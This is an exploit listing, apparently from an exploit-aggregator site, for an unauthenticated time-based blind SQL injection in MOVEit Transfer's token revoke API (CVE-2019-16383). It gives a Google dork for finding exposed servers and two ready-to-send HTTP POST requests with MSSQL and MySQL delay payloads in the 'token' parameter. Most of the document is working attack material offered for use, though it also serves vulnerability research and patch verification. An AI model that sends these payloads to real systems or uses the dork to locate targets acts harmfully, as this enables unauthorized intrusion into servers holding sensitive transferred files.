Exploit for MOVEit Transfer 11.1.1 SQL Injection CVE-2019-16383

Name: Exploit for MOVEit Transfer 11.1.1 SQL Injection CVE-2019-16383
Rating: 5 (74 reviews)

2020-04-13 | CVSS 7.5

## https://sploitus.com/exploit?id=PACKETSTORM:157208
# Exploit Title: MOVEit Transfer 11.1.1 - 'token' Unauthenticated SQL Injection   
# Google Dork: inurl:human.aspx intext:moveit  
# Date: 2020-04-12  
# Exploit Authors: Aviv Beniash, Noam Moshe  
# Vendor Homepage: https://www.ipswitch.com/  
# Version: MOVEit Transfer 2018 SP2 before 10.2.4, 2019 before 11.0.2, and 2019.1 before 11.1.1  
# CVE : CVE-2019-16383  
#   
# Related Resources:  
# https://community.ipswitch.com/s/article/SQL-Injection-Vulnerability  
# https://nvd.nist.gov/vuln/detail/CVE-2019-16383  
  
# Description:  
# The API call for revoking logon tokens is vulnerable to a  
# Time based blind SQL injection via the 'token' parameter  
  
# MSSQL payload:  
  
POST /api/v1/token/revoke HTTP/1.1  
Host: moveittransferstg  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 32  
  
token='; WAITFOR DELAY '0:0:10'--  
  
  
# MySQL payload:  
  
POST /api/v1/token/revoke HTTP/1.1  
Host: moveittransferstg  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 21  
  
token=' OR SLEEP(10);